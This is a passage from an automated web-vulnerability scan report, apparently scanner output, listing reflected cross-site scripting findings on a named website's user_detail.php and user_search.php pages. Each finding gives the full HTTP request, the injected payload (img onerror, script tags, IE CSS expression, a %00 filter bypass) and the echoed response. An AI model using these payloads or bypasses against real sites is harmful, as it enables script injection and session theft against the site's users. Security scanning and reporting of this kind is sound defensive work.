Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:08:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10147

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>User Detail</title>

...[SNIP]...
<b>admin1f42d<img src=a onerror=alert(1)>48035a379b2</b>
...[SNIP]...

2.4931. http://www.resellerbase.com/user_detail.php [u parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/user_detail.php

Issue detail

The value of the u request parameter is copied into the HTML document as plain text between tags. The payload %00387b9<x%20style%3dx%3aexpr/**/ession(alert(1))>b11478c237 was submitted in the u parameter. This input was echoed as 387b9<x style=x:expr/**/ession(alert(1))>b11478c237 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /user_detail.php?u=rijiy%00387b9<x%20style%3dx%3aexpr/**/ession(alert(1))>b11478c237 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:12:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10174

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>User Detail</title>

...[SNIP]...
<b>rijiy\0387b9<x style=x:expr/**/ession(alert(1))>b11478c237</b>
...[SNIP]...

2.4932. http://www.resellerbase.com/user_detail.php [u parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/user_detail.php

Issue detail

The value of the u request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b2c1"><img%20src%3da%20onerror%3dalert(1)>632a75cc10 was submitted in the u parameter. This input was echoed as 4b2c1\"><img src=a onerror=alert(1)>632a75cc10 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /user_detail.php?u=admin4b2c1"><img%20src%3da%20onerror%3dalert(1)>632a75cc10 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/myresellerpanel-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:08:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10153

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>User Detail</title>

...[SNIP]...
<a href="http://www.resellerbase.com/sendmail.php?u=admin4b2c1\"><img src=a onerror=alert(1)>632a75cc10">
...[SNIP]...

2.4933. http://www.resellerbase.com/user_detail.php [u parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/user_detail.php

Issue detail

The value of the u request parameter is copied into the HTML document as plain text between tags. The payload %00b588e<img%20src%3da%20onerror%3dalert(1)>93341557b13 was submitted in the u parameter. This input was echoed as b588e<img src=a onerror=alert(1)>93341557b13 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /user_detail.php?u=filmstw705%00b588e<img%20src%3da%20onerror%3dalert(1)>93341557b13 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:04:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10168

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>User Detail</title>

...[SNIP]...
<b>filmstw705\0b588e<img src=a onerror=alert(1)>93341557b13</b>
...[SNIP]...

2.4934. http://www.resellerbase.com/user_detail.php [u parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/user_detail.php

Issue detail

The value of the u request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88a42"%20style%3dx%3aexpression(alert(1))%209c0d9d14881 was submitted in the u parameter. This input was echoed as 88a42\" style=x:expression(alert(1)) 9c0d9d14881 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /user_detail.php?u=rijiy88a42"%20style%3dx%3aexpression(alert(1))%209c0d9d14881 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:12:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10159

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>User Detail</title>

...[SNIP]...
<a href="http://www.resellerbase.com/sendmail.php?u=rijiy88a42\" style=x:expression(alert(1)) 9c0d9d14881">
...[SNIP]...

2.4935. http://www.resellerbase.com/user_detail.php [u parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/user_detail.php

Issue detail

The value of the u request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d74e8"><a%20b%3dc>807f7c6ebed was submitted in the u parameter. This input was echoed as d74e8\"><a b=c>807f7c6ebed in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /user_detail.php?u=sangagad74e8"><a%20b%3dc>807f7c6ebed HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

2.4936. http://www.resellerbase.com/user_detail.php [u parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/user_detail.php

Issue detail

The value of the u request parameter is copied into the HTML document as plain text between tags. The payload f6992<x%20style%3dx%3aexpr/**/ession(alert(1))>3ab964bde7a was submitted in the u parameter. This input was echoed as f6992<x style=x:expr/**/ession(alert(1))>3ab964bde7a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /user_detail.php?u=johnsun888f6992<x%20style%3dx%3aexpr/**/ession(alert(1))>3ab964bde7a HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:06:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10186

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>User Detail</title>

...[SNIP]...
<b>johnsun888f6992<x style=x:expr/**/ession(alert(1))>3ab964bde7a</b>
...[SNIP]...

2.4937. http://www.resellerbase.com/user_detail.php [u parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/user_detail.php

Issue detail

The value of the u request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 176a1"%20style%3dx%3aexpression(alert(1))%2059d0776d08c was submitted in the u parameter. This input was echoed as 176a1\" style=x:expression(alert(1)) 59d0776d08c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /user_detail.php?u=lobpitte176a1"%20style%3dx%3aexpression(alert(1))%2059d0776d08c HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:08:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10168

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>User Detail</title>

...[SNIP]...
<a href="http://www.resellerbase.com/sendmail.php?u=lobpitte176a1\" style=x:expression(alert(1)) 59d0776d08c">
...[SNIP]...

2.4938. http://www.resellerbase.com/user_search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/user_search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6d196<script>alert(1)</script>ca9531f6925 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /user_search.php6d196<script>alert(1)</script>ca9531f6925 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:24:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /user_search.php6d196<script>alert(1)</script>ca9531f6925 was not found on this server.</p>
...[SNIP]...

2.4939. http://www.resellerbase.com/user_search.php [aol parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/user_search.php

Issue detail

The value of the aol request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83147"><a>7f45903168c was submitted in the aol parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /user_search.php?occupation=555-555-0199@example.com&username=Peter%2bWiener&aol=555-555-0199@example.com83147"><a>7f45903168c&location=555-555-0199@example.com&email=wiener@example.com&interest=555-555-0199@example.com&name=Peter%2bWiener&pflag=search&submit=Search%2bUsers&icq=555-555-0199@example.com&homepage=30&yahoo=555-555-0199@example.com HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/user_search.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 22:59:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 19458

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Search Result</title
...[SNIP]...
<a href="/user_search.php?occupation=555-555-0199@example.com&username=Peter%2bWiener&aol=555-555-0199@example.com83147"><a>7f45903168c&location=555-555-0199@example.com&email=wiener@example.com&interest=555-555-0199@example.com&name=Peter%2bWiener&pflag=search&submit=Search%2bUsers&icq=555-555-0199@example.com&homepage=30&yahoo=555-5
...[SNIP]...

2.4940. http://www.resellerbase.com/user_search.php [biography parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/user_search.php

Issue detail

The value of the biography request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4747"><a>7c69048461 was submitted in the biography parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /user_search.php?pg_which=3&pflag=search&username=&email=&name=&homepage=&icq=&yahoo=&aol=&biography=f4747"><a>7c69048461&interest=&location=&occupation=&ltr= HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/user_search.php?pflag=search
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:01:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 13977

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Search Result</title
...[SNIP]...
<a href="/user_search.php?&pflag=search&username=&email=&name=&homepage=&icq=&yahoo=&aol=&biography=f4747"><a>7c69048461&interest=&location=&occupation=&ltr=%23">
...[SNIP]...

2.4941. http://www.resellerbase.com/user_search.php [email parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/user_search.php

Issue detail

The value of the email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94963"><a>30349241ce0 was submitted in the email parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /user_search.php?pg_which=2&pflag=search&username=&email=94963"><a>30349241ce0&name=&homepage=&icq=&yahoo=&aol=&biography=&interest=&location=&occupation=&ltr= HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/user_search.php?pflag=search
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 22:59:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 14004

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Search Result</title
...[SNIP]...
<a href="/user_search.php?&pflag=search&username=&email=94963"><a>30349241ce0&name=&homepage=&icq=&yahoo=&aol=&biography=&interest=&location=&occupation=&ltr=%23">
...[SNIP]...

2.4942. http://www.resellerbase.com/user_search.php [homepage parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/user_search.php

Issue detail

The value of the homepage request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f722"><a>7c3544e3aeb was submitted in the homepage parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /user_search.php?pg_which=2&pflag=search&username=&email=&name=&homepage=8f722"><a>7c3544e3aeb&icq=&yahoo=&aol=&biography=&interest=&location=&occupation=&ltr= HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/user_search.php?pflag=search
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:00:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 14004

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Search Result</title
...[SNIP]...
<a href="/user_search.php?&pflag=search&username=&email=&name=&homepage=8f722"><a>7c3544e3aeb&icq=&yahoo=&aol=&biography=&interest=&location=&occupation=&ltr=%23">
...[SNIP]...

2.4943. http://www.resellerbase.com/user_search.php [icq parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/user_search.php

Issue detail

The value of the icq request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f347"><a>1a824937a50 was submitted in the icq parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /user_search.php?pg_which=2&pflag=search&username=&email=&name=&homepage=&icq=3f347"><a>1a824937a50&yahoo=&aol=&biography=&interest=&location=&occupation=&ltr= HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/user_search.php?pflag=search
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:00:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 14004

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Search Result</title
...[SNIP]...
<a href="/user_search.php?&pflag=search&username=&email=&name=&homepage=&icq=3f347"><a>1a824937a50&yahoo=&aol=&biography=&interest=&location=&occupation=&ltr=%23">
...[SNIP]...

2.4944. http://www.resellerbase.com/user_search.php [interest parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/user_search.php

Issue detail

The value of the interest request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3a69"><a>905119d8e88 was submitted in the interest parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /user_search.php?occupation=555-555-0199@example.com&username=Peter%2bWiener&aol=555-555-0199@example.com&location=555-555-0199@example.com&email=wiener@example.com&interest=555-555-0199@example.come3a69"><a>905119d8e88&name=Peter%2bWiener&pflag=search&submit=Search%2bUsers&icq=555-555-0199@example.com&homepage=30&yahoo=555-555-0199@example.com HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/user_search.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:01:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 19458

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Search Result</title
...[SNIP]...
f="/user_search.php?occupation=555-555-0199@example.com&username=Peter%2bWiener&aol=555-555-0199@example.com&location=555-555-0199@example.com&email=wiener@example.com&interest=555-555-0199@example.come3a69"><a>905119d8e88&name=Peter%2bWiener&pflag=search&submit=Search%2bUsers&icq=555-555-0199@example.com&homepage=30&yahoo=555-555-0199@example.com&ltr=%23">
...[SNIP]...

2.4945. http://www.resellerbase.com/user_search.php [location parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/user_search.php

Issue detail

The value of the location request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7bf6e"><a>073c336f7d0 was submitted in the location parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /user_search.php?occupation=555-555-0199@example.com&username=Peter%2bWiener&aol=555-555-0199@example.com&location=555-555-0199@example.com7bf6e"><a>073c336f7d0&email=wiener@example.com&interest=555-555-0199@example.com&name=Peter%2bWiener&pflag=search&submit=Search%2bUsers&icq=555-555-0199@example.com&homepage=30&yahoo=555-555-0199@example.com HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/user_search.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:00:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 19458

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Search Result</title
...[SNIP]...
<a href="/user_search.php?occupation=555-555-0199@example.com&username=Peter%2bWiener&aol=555-555-0199@example.com&location=555-555-0199@example.com7bf6e"><a>073c336f7d0&email=wiener@example.com&interest=555-555-0199@example.com&name=Peter%2bWiener&pflag=search&submit=Search%2bUsers&icq=555-555-0199@example.com&homepage=30&yahoo=555-555-0199@example.com&ltr=%23">
...[SNIP]...

2.4946. http://www.resellerbase.com/user_search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/user_search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6be1"><script>alert(1)</script>6a1b1d89052 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /user_search.php?pflag=search&b6be1"><script>alert(1)</script>6a1b1d89052=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 21:24:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 26462

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Search Result</title
...[SNIP]...
<a href="/user_search.php?pflag=search&b6be1"><script>alert(1)</script>6a1b1d89052=1&ltr=%23">
...[SNIP]...

2.4947. http://www.resellerbase.com/user_search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/user_search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 725a8"><a>6b697e5711f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /user_search.php?occupation=555-555-0199@example.com&username=Peter%2bWiener&aol=555-555-0199@example.com&location=555-555-0199@example.com&email=wiener@example.com&interest=555-555-0199@example.com&name=Peter%2bWiener&pflag=search&submit=Search%2bUsers&icq=555-555-0199@example.com&homepage=30&yahoo=555-555-0199@example/725a8"><a>6b697e5711f.com HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/user_search.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
